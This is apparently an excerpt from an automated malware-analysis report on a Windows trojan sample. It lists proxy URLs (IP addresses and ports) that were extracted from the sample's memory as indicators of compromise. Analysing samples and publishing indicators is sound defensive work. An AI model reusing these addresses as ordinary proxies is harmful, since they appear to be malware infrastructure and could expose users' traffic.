                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.30:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.30:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.46:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.46:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.49:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.49:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F89000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.52:36902
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C813B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.52:36902://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.5:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.5:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.63:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.63:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C918F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.66:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C918F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.66:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.82:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.82:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.93:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.93:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.94:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.94:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.235.12.130:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.235.12.130:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.186:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.245.189.194:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.245.189.194:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.248.86.237:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.248.86.237:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.253.30.1:10081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.253.30.1:10081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.255.125.12
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.255.125.12://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.0.198.132:54321
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.0.198.132:54321://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.0.198.132:54321x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.105.111.86:6764
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.105.111.86:6764://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:13270
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:13270://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:27055
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:27055://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:30794
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:30794://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:32229
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:32229://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:4971
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:4971://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:60406
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.117:60406://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:37106
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:37106://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:37106x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:3820
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:3820://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:49878
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:49878://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C940C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C941A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:50205
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C940C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:50205://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.239:37785
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.239:37785://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EEE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.53:15619
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8EFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.53:15619://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.176.54.34:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.176.54.34:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8460000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.122.10:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.122.10:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.70.20:31028
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.70.20:31028://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:8080://proxy0
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7820000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C780F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.211.99.26:9300
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.211.99.26:9300://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.27.82.143:2458
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.27.82.143:2458://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.27.82.161:9050
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.27.82.161:9050://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.37.57.112
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.37.57.112://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.37.57.112:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.44.255.3:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:17986
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:17986://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:31683
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:31683://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C699A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:38242
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:38242://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.211.235:11096
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.211.235:11096://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.84.3:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.84.3:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C927B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.105.242:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C927B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.105.242:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.188.92.47:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.188.92.47:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.188.93.214:9000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.188.93.214:9000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.204.248.118:49165
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.204.248.118:49165://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.204.248.124:59484
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.204.248.124:59484://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD5F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.204.248.170:49165
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.204.248.170:49165://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.58.184.97:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.58.184.97:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.60.103.160
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.60.103.160://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.60.103.160:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.138.19.228:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.138.19.228:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.139.187.83:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.139.187.83:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.189.148.1:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.189.148.1:8080://proxy
